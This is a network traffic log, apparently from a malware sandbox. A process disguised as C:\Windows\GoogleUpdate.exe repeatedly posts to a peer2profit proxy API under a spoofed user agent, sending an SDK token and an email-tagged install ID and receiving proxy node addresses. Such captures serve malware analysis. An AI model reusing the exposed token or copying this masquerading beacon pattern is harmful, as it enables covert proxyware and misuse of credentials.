2022-11-26 10:19:32 UTC	2549	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:32 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2e68dffbbf5-FRA
2022-11-26 10:19:32 UTC	2549	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
121	192.168.2.5	50073	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:32 UTC	2549	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:32 UTC	2550	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:32 UTC	2550	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:32 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2e87f498fee-FRA
2022-11-26 10:19:32 UTC	2550	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
122	192.168.2.5	50075	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:32 UTC	2550	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:32 UTC	2550	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:32 UTC	2550	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:32 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2ea49565b8c-FRA
2022-11-26 10:19:32 UTC	2551	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
123	192.168.2.5	50078	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:33 UTC	2551	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:33 UTC	2551	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:33 UTC	2551	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:33 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2ec0c106997-FRA
2022-11-26 10:19:33 UTC	2551	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
124	192.168.2.5	50082	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:33 UTC	2551	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:33 UTC	2552	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:33 UTC	2552	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:33 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2edec48692e-FRA
2022-11-26 10:19:33 UTC	2552	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
125	192.168.2.5	50085	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:33 UTC	2552	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:33 UTC	2552	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:33 UTC	2553	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:33 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2efcfe1913c-FRA
2022-11-26 10:19:33 UTC	2553	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
126	192.168.2.5	50088	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:33 UTC	2553	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:33 UTC	2553	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:34 UTC	2553	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:34 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2f16a149a1e-FRA
2022-11-26 10:19:34 UTC	2553	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
127	192.168.2.5	50091	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:34 UTC	2554	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:34 UTC	2554	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:34 UTC	2554	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:34 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2f34c949b37-FRA
2022-11-26 10:19:34 UTC	2554	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
128	192.168.2.5	50093	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:34 UTC	2554	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:34 UTC	2554	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:34 UTC	2555	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:34 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2f58f609028-FRA
2022-11-26 10:19:34 UTC	2555	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
129	192.168.2.5	50095	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:34 UTC	2555	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:34 UTC	2555	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:34 UTC	2555	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:34 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2f74ca49152-FRA
2022-11-26 10:19:34 UTC	2555	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49747	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:22 UTC	2475	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:22 UTC	2475	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:22 UTC	2475	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:22 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e12fcf585c6e-FRA
2022-11-26 10:18:22 UTC	2476	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
130	192.168.2.5	50098	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:35 UTC	2556	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:35 UTC	2556	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:35 UTC	2556	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:35 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2f9199c696a-FRA
2022-11-26 10:19:35 UTC	2556	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
131	192.168.2.5	50101	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
